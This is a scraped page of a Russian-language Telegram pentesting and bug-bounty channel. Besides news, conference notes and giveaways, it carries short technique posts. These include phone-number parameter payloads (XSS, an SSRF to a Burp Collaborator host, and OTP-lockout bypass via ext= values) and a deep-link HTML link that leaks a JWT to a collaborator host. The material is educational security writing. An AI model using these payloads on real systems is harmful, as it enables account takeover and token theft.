Что-то на пентестерском
Open in Telegram
Веб, мобилки, баг баунти, пиво Йа - @fir3wall1 Чат - https://t.me/+-2ADwiR095I5YzQy
Show more2 522
Subscribers
No data24 hours
+27 days
+830 days
Posts Archive
\n// Следует поставить в query string параметр в который помещен номер\n\n ✅ SSRF \n+88005553535;phone-context=burpcollab\n// Работает редко, в основном на старых системах\n\n ✅ OTP Обход блокировки \n+88005553535;ext=0 \n+88005553535;ext=2 \n+88005553535;ext=3\n// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили \n\n📌 Более подробно изучить можно тут:\n— HackTricks\n\nЧТНП | #web","datePublished":"2023-09-04T01:53:28Z","dateModified":"2023-09-04T01:53:28Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":707},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":19},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":45}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/102","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/102","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/102","headline":"⛈ Android Insecure logging в виде инфографики","articleBody":"⛈ Android Insecure logging в виде инфографики","datePublished":"2023-08-28T00:39:09Z","dateModified":"2023-08-28T00:39:09Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":463},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":6}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/98","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/98","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/98","headline":"⛈ Android Insecure logging в виде инфографики Решил попробовать в инфографику, дай знать если понравилось или…","articleBody":"⛈ Android Insecure logging в виде инфографики\nРешил попробовать в инфографику, дай знать если понравилось или что-то поменять надо 🍴","datePublished":"2023-08-28T00:08:16Z","dateModified":"2023-08-28T00:38:57Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":34},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/94","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/94","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/94","headline":"⛈Поход на OFFZONE Поход на OFFZONE получился приятным и хорошим. Организаторы смогли передать атмосферу а-ля…","articleBody":"⛈Поход на OFFZONE \n\nПоход на OFFZONE получился приятным и хорошим. \nОрганизаторы смогли передать атмосферу а-ля хакерской тусовки, а стенды компаний придумали веселые квесты и неожиданные плюшки для комьюнити багхантеров/пентестеров.\n\n🟢Тинькофф задарил мерчем за багу о которой я писал, подарили: термос показывающий температуру, стикеры, кнопки для одежды на магните, пряник с надписью Багханчу за еду 😁\n🟢Offzone при входе уже дарил мерч - пластмассовая красивая бутылка, еще и оригинальный бейдж в виде платы на которую можно еще и цеплять крутые аддоны от различных стендов\nК тому же был еще и бесплатный кальян, а Positive Tech угощали фирменным пивом и всё это на крыше, откуда открывается красивый вид на тусовку снизу под музыку жанра техно 👍\n🟢Удалось вживую встретится со многими крутыми ребятами и даже с теми, кого давно знаешь но ни разу не видел вживую. Спикеры и доклады были на высоте, много полезного для себя подчеркнул\nИ это еще не всё..\n \n📌 Сама атмосфера даёт мотивации двигаться и развиваться дальше, также позволяет просто поговорить душевно с разными людьми, обмениваться опытом. Всё таки комьюнити у нас суперское\nТем, кто не был - советую прийти в следующем году 👍\nHappy hacking 🤝\n\nЧТНП | #блабла","datePublished":"2023-08-25T21:10:43Z","dateModified":"2023-08-25T21:10:43Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":5,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":676},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":5}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/93","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/93","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/93","headline":"⛈ Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров Данное руководство позволит…","articleBody":"⛈ Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров\n\nДанное руководство позволит тебе начать свой путь в мир баг баунти и веб пентеста, закрыть пробелы в знаниях и темах\nПошагово даёт понимание что изучать и на каком этапе, собраны еще и ресурсы где могут обучить хантить бесплатно. Happy hacking 😉\n\n📶 Bug Bounty Blueprint\n\nЧТНП | #web","datePublished":"2023-08-22T10:11:52Z","dateModified":"2023-08-22T10:11:52Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1394},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":111}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/92","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/92","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/92","headline":"Иии победителем в розыгрыше OFFZONE становится @Rusikergo Поздравим победителя 🎉🎉","articleBody":"Иии победителем в розыгрыше OFFZONE становится @Rusikergo\nПоздравим победителя 🎉🎉","datePublished":"2023-08-14T21:07:41Z","dateModified":"2023-08-14T21:07:41Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":575},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/91","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/91","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/91","headline":"И так, все готовы?)","articleBody":"И так, все готовы?)","datePublished":"2023-08-14T21:00:45Z","dateModified":"2023-08-14T21:00:45Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":4,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":549},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":4}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/90","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/90","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/90","headline":"⛈ Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим дру…","articleBody":"⛈ Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим другом из канала Дневник безопасника решили увеличить ваши шансы на выигрыш.\n\nВсё просто. От вас требуется:\n⬜️ Оставить любой комментарий под этим постом и под этим\n⬜️ Быть подписанным на Дневник Безопасника и этот канал\n\n📌 До конца розыгрыша осталось: 6 часов 🔥\nРовно в 00:00 по МСК времени 15 числа опубликуем победителя 😎","datePublished":"2023-08-14T15:01:20Z","dateModified":"2023-08-14T15:01:20Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":4,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":574},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":4}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/89","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/89","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/89","headline":"⚔️ Заряжайся адреналином и присоединяйся к команде атакующих! Участвуй во Всероссийской студенческой кибербит…","articleBody":"⚔️ Заряжайся адреналином и присоединяйся к команде атакующих! \n\nУчаствуй во Всероссийской студенческой кибербитве и сражайся за приз в 100 000 рублей! 😎\n\nInnostage ищет ребят, которые будут взламывать объекты инфраструктуры коммерческих предприятий и государственных структур на базе учебного виртуального киберполигона Innostage.\n\nПрисоединяйся, если ты:\n✔️ студент российского вуза\n✔️ имеешь опыт CTF-соревнований\n✔️ можешь собрать свою команду или уже в ней состоишь\n✔️ хочешь проверить свои силы в условиях, максимально приближенных к реальности\n\nТебе предстоит сразиться со студентами, которые прошли подготовку в условиях настоящего SOC!\n\nГотов принять их вызов? Тогда переходи по ссылке и регистрируйся. Прием заявок до 19 августа.","datePublished":"2023-08-13T02:39:44Z","dateModified":"2023-08-13T02:39:44Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":748},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":9},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}}]}





+3
+3


Repost from RPPA PRO: Privacy • AI • Cybersecurity • IP
#podcast #НеДляГалочки
Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером😄
ОСТОРОЖНО! В этом выпуске много практических кейсов, конкретных рекомендаций и историй из жизни хакера.
💡Apple, Яндекс
🎤Ведущие выпуска:
🔵Кристина Боровикова, со-основатель RPPA, Kept Privacy Team Lead
🔵Елизавета Дмитриева, data privacy engineer в российском инхаусе
🆕Помогали справиться с кошмаром:
🔵Александр Герасимов — этичный хакер, эксперт в области тестирования на проникновение и анализа защищенности. Директор по информационной безопасности и сооснователь Awillix.
🔵Елизавета Никулина — директор по маркетингу и PR в Awillix
Обсудили:
⬇️Векторы атак
⬇️Жизненный цикл утечек данных
⬇️Последствия утечек для человека
⬇️Реагирование на инциденты, а том числе PR-позиция компании
⬇️Немного коснулись базовой инфобезной терминологии
⛈ OWASP Mobile Top Ten 2023
Наконец-то, спустя 7 лет вышел топ 10 по мобилкам
Вот как это теперь выглядит вкратце:
🟢M1: Improper Credential Usage
🟢M2: Inadequate Supply Chain Security
🟢M3: Insecure Authentication/Authorization
🟢M4: Insufficient Input/Output Validation
🟢M5: Insecure Communication
🟢M6: Inadequate Privacy Controls
🟢M7: Insufficient Binary Protections
🟢M8: Security Misconfiguration
🟢M9: Insecure Data Storage
🟢M10: Insufficient Cryptography
Happy hacking ☺️
📌 Полезные ссылки по апдейту:
📶 Мысли основателя канала Android Guard
📶 OWASP 2023
ЧТНП | #mobile
Repost from wr3dmast3r vs pentest
Content-Security-Policy: способ борьбы с уязвимостями межсайтового скриптинга 🔒
Настройка, использование и способы обхода защиты 🐈
https://telegra.ph/Content-Security-Policy-10-31
Repost from Standoff 365
🤩 Конкурс инвайтов на Standoff Hacks за лучшие материалы о прикладной безопасности завершен!
Талантливые авторы присоединятся к нашему priv8-ивенту, который пройдет 26 ноября в рамках Moscow Hacking Week.
Пять инвайтов мы разыграли за самые крутые статьи. Вот ники победителей и их темы:
1. whoamins. «Обычный Client Side с необычной эксплуатацией»
2. qwqoro. «E-mail Injection»
3. iSavAnna. «Не все "ошибки" одинаково полезны — с точки зрения безопасности»
4. Ivan. «Как не стоит обрезать изображения. aCropalypse (CVE-2023-21036)»
5. Firewall. «Как ломать сайты на 1С-Битрикс»
Один бонусный, шестой, инвайт — за видео «Гайд по рекону в багбаунти для новичков», его получает lifei8hitt.
А еще свою статью «Анализ прошивки» прислал superhacker123 — она вышла достойной, но ее автор получил инвайт еще до конкурса 😉
Все работы скоро будут опубликованы на Хабре (следить за обновлениями можно здесь) — они помогут специалистам по кибербезопасности стать еще сильнее (и, возможно, принять участие в следующем Hacks). С заслуженной победой! 👏
⛈ Android & iOS Deep link vuln
Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем как найти в них уязвимости
🟢Deep Link
По сути дип линк нужен для координации или перенаправления в те или иные части мобильного приложения
Нужно это для удобства, ты можешь легко переключаться между приложениями или переходить с веб-сайта на приложение без переключения на само мобильное приложение
У каждого приложения свой дип линк и выглядит примерно так:
➡️ название_приложения://параметр
➡️ keklol://open_document=name
🟢Ищем уязвимости
Уязвимости возникают за счет неправильной обработки параметров из дип линков
Уязвимости могут быть разные в зависимости от того, что за параметр перед вами
➡️ Кейс:
Коллега на работе нашел уязвимость CSRF, данная уязвимость позволяла присылать JWT токен на burp collaborator
⬜️ Сначала ищем параметры дип линка, найти их можно при реверсе самого приложения, либо через утилиту strings
⬜️ Обнаружился параметр URL, который принимал сторонние ссылки
⬜️ Поскольку дип линк это ссылка, значит нужно создать эксплойт в виде простой html страницы с внедрением данного дип линка и его параметра
<a href="keklol://url=http://burp_collab">click</a>
⬜️ После открытия ссылки, на burp collaborator приходит jwt token, раскодировав токен, в нем обнаруживается конфиденциальная информация о пользователе
🟢Заключение
В целом на этом всё, импакт от этого может быть разный, в зависимости от того, что ты получаешь в ответ, если это RCE то критический, если присылаются пользовательские данные - высокий
Если можно заставить пользователя подписаться на какие-то каналы - низкий
Happy hacking ☺️
📌 В качестве дополнительных примеров делюсь полезными ссылками:
📶 RCE через deep link
📶 CSRF в приложении перископ
ЧТНП | #mobile
Repost from Похек
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare
Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.
#xakep #cloudflare
💬 Канал | 📡 Хакер | ➡️Более подробная информация
⛈ IDOR - как предсказать идентификатор
Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID
Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывается как баг хантеры смогли предсказать ID и получить IDOR
Happy hacking 😉
📶 IDOR - how to predict an identifier
ЧТНП | #web
⛈ IDOR - как предсказать идентификатор
Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID
Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывают как баг хантеры смогли предсказать ID и получить IDOR
Happy hacking 😉
📶 IDOR - how to predict an identifier
ЧТНП | #web
⛈ Атаки на механизм ввода номера телефона
Привет! Давай разберемся как найти уязвимости в форме ввода телефона.
Согласно RFC 5341 URI номера телефона может иметь параметры, которые нужны для передачи более точных данных
Чаще всего параметры принимают почтовые сервисы либо веб-приложения в которых отсутствует жесткая валидация номеров.
🟩Пример: параметр phone-context может использоваться для определения того, какой код страны(+7,+1) используется. Если ты зашел на сайт и определился твой город, то при регистрации вводя свой номер телефона, ты можешь вписать свой номер без кода страны т.к. он может подставится в параметр.
🟩Атаки используя параметры:
✅ XSS
+88005553535;phone-context=<script>alert(1)</script>
// Следует поставить в query string параметр в который помещен номер
✅ SSRF
+88005553535;phone-context=burpcollab
// Работает редко, в основном на старых системах
✅ OTP Обход блокировки
+88005553535;ext=0
+88005553535;ext=2
+88005553535;ext=3
// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили
📌 Более подробно изучить можно тут:
— HackTricks
ЧТНП | #web⛈ Android Insecure logging в виде инфографики
Решил попробовать в инфографику, дай знать если понравилось или что-то поменять надо 🍴
⛈Поход на OFFZONE
Поход на OFFZONE получился приятным и хорошим.
Организаторы смогли передать атмосферу а-ля хакерской тусовки, а стенды компаний придумали веселые квесты и неожиданные плюшки для комьюнити багхантеров/пентестеров.
🟢Тинькофф задарил мерчем за багу о которой я писал, подарили: термос показывающий температуру, стикеры, кнопки для одежды на магните, пряник с надписью Багханчу за еду 😁
🟢Offzone при входе уже дарил мерч - пластмассовая красивая бутылка, еще и оригинальный бейдж в виде платы на которую можно еще и цеплять крутые аддоны от различных стендов
К тому же был еще и бесплатный кальян, а Positive Tech угощали фирменным пивом и всё это на крыше, откуда открывается красивый вид на тусовку снизу под музыку жанра техно 👍
🟢Удалось вживую встретится со многими крутыми ребятами и даже с теми, кого давно знаешь но ни разу не видел вживую. Спикеры и доклады были на высоте, много полезного для себя подчеркнул
И это еще не всё..
📌 Сама атмосфера даёт мотивации двигаться и развиваться дальше, также позволяет просто поговорить душевно с разными людьми, обмениваться опытом. Всё таки комьюнити у нас суперское
Тем, кто не был - советую прийти в следующем году 👍
Happy hacking 🤝
ЧТНП | #блабла
⛈ Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров
Данное руководство позволит тебе начать свой путь в мир баг баунти и веб пентеста, закрыть пробелы в знаниях и темах
Пошагово даёт понимание что изучать и на каком этапе, собраны еще и ресурсы где могут обучить хантить бесплатно. Happy hacking 😉
📶 Bug Bounty Blueprint
ЧТНП | #web
Иии победителем в розыгрыше OFFZONE становится @Rusikergo
Поздравим победителя 🎉🎉
⛈ Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим другом из канала Дневник безопасника решили увеличить ваши шансы на выигрыш.
Всё просто. От вас требуется:
⬜️ Оставить любой комментарий под этим постом и под этим
⬜️ Быть подписанным на Дневник Безопасника и этот канал
📌 До конца розыгрыша осталось: 6 часов 🔥
Ровно в 00:00 по МСК времени 15 числа опубликуем победителя 😎
⚔️ Заряжайся адреналином и присоединяйся к команде атакующих!
Участвуй во Всероссийской студенческой кибербитве и сражайся за приз в 100 000 рублей! 😎
Innostage ищет ребят, которые будут взламывать объекты инфраструктуры коммерческих предприятий и государственных структур на базе учебного виртуального киберполигона Innostage.
Присоединяйся, если ты:
✔️ студент российского вуза
✔️ имеешь опыт CTF-соревнований
✔️ можешь собрать свою команду или уже в ней состоишь
✔️ хочешь проверить свои силы в условиях, максимально приближенных к реальности
Тебе предстоит сразиться со студентами, которые прошли подготовку в условиях настоящего SOC!
Готов принять их вызов? Тогда переходи по ссылке и регистрируйся. Прием заявок до 19 августа.
